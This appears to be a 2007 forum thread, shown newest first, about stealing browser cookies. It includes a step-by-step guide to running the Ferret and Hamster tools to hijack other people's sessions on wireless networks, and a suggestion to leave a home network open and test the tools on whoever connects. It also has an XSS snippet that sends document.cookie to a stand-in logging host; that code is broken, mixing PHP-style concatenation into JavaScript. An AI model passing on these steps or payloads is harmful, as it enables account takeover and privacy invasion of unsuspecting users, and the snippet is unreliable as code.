Grab Cookies replied by LatecomerX @ Wed, 05 Sep 2007 15:58:17 +0800

LatecomerX — Wed, 05 Sep 2007 15:58:17 +0800

Originally posted by HygieneSetsco:

erm. under what conditions can i use this?

like only at wireless hotspots, where people are using wireless as well? or can i use it at my desktop at home.

If you own a wireless router and currently on subscription of a broadband connection, you can try "unsecuring" your home wireless network and see if anyone tries to use your connection to surf the net. And of course, if there is, try it out on him/her, lol.

Anyway, don't dwell into such stuff for too long - everyone deserves their privacy. I hope you are taking this out of curiosity to learn about networking and not on how to stalk on others etc.

Grab Cookies replied by ndmmxiaomayi @ Wed, 05 Sep 2007 12:48:49 +0800

ndmmxiaomayi — Wed, 05 Sep 2007 12:48:49 +0800

This tool is solely for wireless only. There is another one around... but whatever it is, you will need Winpcap on Windows (it's a packet capturing library) or libpcap on Linux. Mac is Unix system as well... should be using lipcap... not too sure.

For Linux, compile and run the codes. For Windows, download the .EXE file.

Try it on your home network rather than outside. I don't guarantee that you won't be caught.

Grab Cookies replied by HygieneSetsco @ Wed, 05 Sep 2007 10:50:12 +0800

HygieneSetsco — Wed, 05 Sep 2007 10:50:12 +0800

erm. under what conditions can i use this?

like only at wireless hotspots, where people are using wireless as well? or can i use it at my desktop at home.

Grab Cookies replied by LatecomerX @ Wed, 05 Sep 2007 04:28:25 +0800

LatecomerX — Wed, 05 Sep 2007 04:28:25 +0800

I have just finish reading the included word document, and I can say that it is really helpful as it includes a step-by-step guide containing many screenshots; you would probably skip the chunk of text under "Sidejacking without Hamster" since it is a little advanced.

Just to summarize things up a bit, mostly similar to their readme.txt,

1. Install WinPcap.
2. Unzip the contents of sidejacking.zip to C:\sidejacking or anything simple
3. Hit Windows Key+R, run 'cmd' without the quotes
4. In the black box that appears, type in 'cd C:\sidejacking' and press Enter. The next line should start with the same folder name as well.
5. Type in 'ferret [dash]W' and Enter. If you get a packet.dll error, you would probably have forgotten about installing WinPcap
6. A list of connection interfaces should then appear. Remember the number that represents your wireless device.
7. Use a browser that you don't usually use, eg. IE. And configure its proxy options. Instructions for IE here.
8. In the black box, type in "ferret.exe [dash]i [Number from Step 6]"
9. Type in 'start hamster' thereafter. If you see a 'hamster.txt: No such file or directory' error, it means you screwed up somewhere along, or my summary is missing something. Always believe in yourself first. =P
10. After setting up the proxy options at Step 7, go to 'http://hamster/'
11. You should see a list of IP addresses here. Click on one of them.

Extra, non-essential info:
I'm quite inexperienced in networking, but I suppose those are IP addresses which are only used within the network to identify users so that the router or whatever knows where should each data packet go to. This has nothing to do with cookies, btw.

12. Click on one of the links on the left panel.

You have three options here. You can view the raw cookies for this IP address (discussed below). You can click on a URL that has a HIGHER probability of being Sidejacked. Or you can choose from the URLs below, which have a lower probability of being Sidejacked.

13. You did it, you jackfruit! gratz.

And a disclaimer: this is solely for educational purposes. No ferret or hamster was harmed while I was experimenting with the tools. =P

Grab Cookies replied by LatecomerX @ Wed, 05 Sep 2007 03:42:42 +0800

LatecomerX — Wed, 05 Sep 2007 03:42:42 +0800

Nope, I didn't get a chance to. I don't own a laptop, and people who are still on those "unsecured wireless networks" with routers within the range of my adapter are kinda rare.

Anyway, there's a readme.txt and a Word document that should be able to guide you in getting the hamster running, not literally. And here's the link to download WinPcap.

http://www.winpcap.org/install/bin/WinPcap_4_0_1.exe

And here's the content of the readme.txt file.

If you encounter problems with one of the steps, maybe you could post a screenshot back with details onto this thread and wait for a reply, from mayi hopefully.

Grab Cookies replied by HygieneSetsco @ Wed, 05 Sep 2007 02:36:19 +0800

HygieneSetsco — Wed, 05 Sep 2007 02:36:19 +0800

hey @ LatecomerX, are you able to use it?

Grab Cookies replied by LatecomerX @ Wed, 05 Sep 2007 01:21:59 +0800

LatecomerX — Wed, 05 Sep 2007 01:21:59 +0800

Originally posted by yiha093:

i undersrand this
chim la

Hmm, try this. They have "packaged" it to an all-in-one.

http://www.erratasec.com/sidejacking.zip

from

http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html

Grab Cookies replied by yiha093 @ Tue, 04 Sep 2007 17:35:50 +0800

yiha093 — Tue, 04 Sep 2007 17:35:50 +0800

Originally posted by LatecomerX:

Not really lo. Simply put, he's catching cookies in the air. So just be careful when surfing on public wireless hotspots - you never know if mayi is there. XD

i undersrand this
chim la

Grab Cookies replied by Tremors @ Tue, 04 Sep 2007 14:56:40 +0800

Tremors — Tue, 04 Sep 2007 14:56:40 +0800

Grab Cookies replied by LatecomerX @ Tue, 04 Sep 2007 14:55:01 +0800

LatecomerX — Tue, 04 Sep 2007 14:55:01 +0800

Originally posted by yiha093:

chim la hong gan

Not really lo. Simply put, he's catching cookies in the air. So just be careful when surfing on public wireless hotspots - you never know if mayi is there. XD

Grab Cookies replied by yiha093 @ Tue, 04 Sep 2007 11:35:13 +0800

yiha093 — Tue, 04 Sep 2007 11:35:13 +0800

Originally posted by LatecomerX:

Got lo. I just gave you my 2 cents. =P

Anyway, is the tool related to this article, or some other stuff?

http://blogs.zdnet.com/Ou/?p=651

chim la hong gan

Grab Cookies replied by yiha093 @ Tue, 04 Sep 2007 11:31:26 +0800

yiha093 — Tue, 04 Sep 2007 11:31:26 +0800

Originally posted by LatecomerX:

Got lo. I just gave you my 2 cents. =P

Anyway, is the tool related to this article, or some other stuff?

http://blogs.zdnet.com/Ou/?p=651

latercomer also pro ah

Grab Cookies replied by ndmmxiaomayi @ Tue, 04 Sep 2007 01:46:46 +0800

ndmmxiaomayi — Tue, 04 Sep 2007 01:46:46 +0800

Originally posted by LatecomerX:

Got lo. I just gave you my 2 cents. =P

Anyway, is it related to this article, or some other stuff?

http://blogs.zdnet.com/Ou/?p=651

Yes, it's related to this article.

Grab Cookies replied by LatecomerX @ Tue, 04 Sep 2007 01:44:59 +0800

LatecomerX — Tue, 04 Sep 2007 01:44:59 +0800

Originally posted by ndmmxiaomayi:

Ya, bluff you no money. Google some keywords and you will find that tool. I played with it, pretty cool tool.

Got lo. I just gave you my 2 cents. =P

Anyway, is the tool related to this article, or some other stuff?

http://blogs.zdnet.com/Ou/?p=651

Grab Cookies replied by ndmmxiaomayi @ Mon, 03 Sep 2007 18:55:26 +0800

ndmmxiaomayi — Mon, 03 Sep 2007 18:55:26 +0800

Originally posted by LatecomerX:

Shi meh? So far I only heard of traffic sniffing in wireless networks and XSS, now got tools to facilitate cookie stealing one ah?

Ya, bluff you no money. Google some keywords and you will find that tool. I played with it, pretty cool tool.

Grab Cookies replied by manyu882 @ Mon, 03 Sep 2007 10:15:02 +0800

manyu882 — Mon, 03 Sep 2007 10:15:02 +0800

i still rmb i hack my friend's neopets account using cookies. . it was like 6 yrs ago..

but now technology advance too fast. the login information will change if the person log out from his account.

Grab Cookies replied by yiha093 @ Mon, 03 Sep 2007 04:25:44 +0800

yiha093 — Mon, 03 Sep 2007 04:25:44 +0800

chimchim

Grab Cookies replied by LatecomerX @ Mon, 03 Sep 2007 03:08:27 +0800

LatecomerX — Mon, 03 Sep 2007 03:08:27 +0800

Originally posted by HygieneSetsco:

so i guess i'm not allowed to learn how to do it?

Hmm there are plenty of sites out there to learn about XSS and SQL injection. But the issue here is about finding a vulnerability on a website that, say, that will allow you to post unencoded HTML. So to grab cookie contents, you would probably write something like:

code:





var url = 'http://example.com/evil_logging_script.php?cookie_contents=' . document.cookie;

document.write('');

So for example, if you could plant this code into a forum post, as "raw" HTML, everytime the post is loaded, the browser will attempt to load a 0 pixel by 0 pixel (aka unseen) image using the URL which is embedded with the user's cookie information. And on the other side, when the "image", which is a script, receives the request, it ignores it and does something like storing the cookie information that was passed to it through the URL.

But most scripts around filters all these HTML tags from user input so it is quite pointless unless you really have so much free time going around to try this out on different websites.

If you are really interested, you can read on the technical explanation of the infamous MySpace worm, aka Samy Worm. It does not need to steal cookie - it uses the victim's computer to do what the coder wanted. Also, another reason why you are less safe using IE than other browsers - under Step 1, "However, some browsers (IE, some versions of Safari, others) allow javascript within CSS tags. We needed javascript to get any of this to even work".

http://namb.la/popular/tech.html

Grab Cookies replied by LatecomerX @ Mon, 03 Sep 2007 02:49:28 +0800

LatecomerX — Mon, 03 Sep 2007 02:49:28 +0800

Originally posted by ndmmxiaomayi:

Technically possible. There's even a tool to do that. Those who went Defcon or Blackhat will know.

Shi meh? So far I only heard of traffic sniffing in wireless networks and XSS, now got tools to facilitate cookie stealing one ah?

Grab Cookies replied by amusing_dick @ Mon, 03 Sep 2007 02:34:23 +0800

amusing_dick — Mon, 03 Sep 2007 02:34:23 +0800

and thats how i lost my neopets account which was still hot at that time on a window 98 system with no knowledge of firewall or any anti virus system..
till one day some1 conned me into his website and thats it.. my 2yrs effort gone down the drain..

Grab Cookies replied by HygieneSetsco @ Mon, 03 Sep 2007 02:06:42 +0800

HygieneSetsco — Mon, 03 Sep 2007 02:06:42 +0800

so i guess i’m not allowed to learn how to do it?

Grab Cookies replied by ndmmxiaomayi @ Sun, 02 Sep 2007 01:17:54 +0800

ndmmxiaomayi — Sun, 02 Sep 2007 01:17:54 +0800

Cookies contain log in and session information. Grab that of course to steal password or to hijack a session.

Session is the time between you log in to a website and the time you log out of a website.

Grab Cookies replied by MooKu @ Sun, 02 Sep 2007 01:09:45 +0800

MooKu — Sun, 02 Sep 2007 01:09:45 +0800

What’s does grabbing cookies do?

Grab Cookies replied by ndmmxiaomayi @ Sun, 02 Sep 2007 01:09:02 +0800

ndmmxiaomayi — Sun, 02 Sep 2007 01:09:02 +0800

Technically possible. There's even a tool to do that. Those who went Defcon or Blackhat will know.

Grab Cookies replied by LatecomerX @ Sat, 01 Sep 2007 23:01:14 +0800

LatecomerX — Sat, 01 Sep 2007 23:01:14 +0800

Pay Famous Amos to sell you some ba.

Anyway,

1. It may be considered as an invasion of privacy. Don't you just love those spywares lurking somewhere within your computer, or the list of tracking cookies that shows up during your monthly clean-up?

2. Technically it is not supposed to be possible through a web script, as cookies usually can only be accessed within the same domain. So for example, if you want to grab cookies created at sgForums.com, the script must be hosted in sgForums.com as well. But some almost-genius in the past have managed to do so through cross-site scripting and SQL injection due to vulnerabilities in scripts. (Hint: sgForums is rumoured to be using a very old version of phpBB. XD) Google those terms if you are interested.

So, unless you plan to come up with a desktop solution, as in a spyware or some of its counterparts, in conclusion, this is not possible.

Recent Posts in 'Grab Cookies' | sgForums.com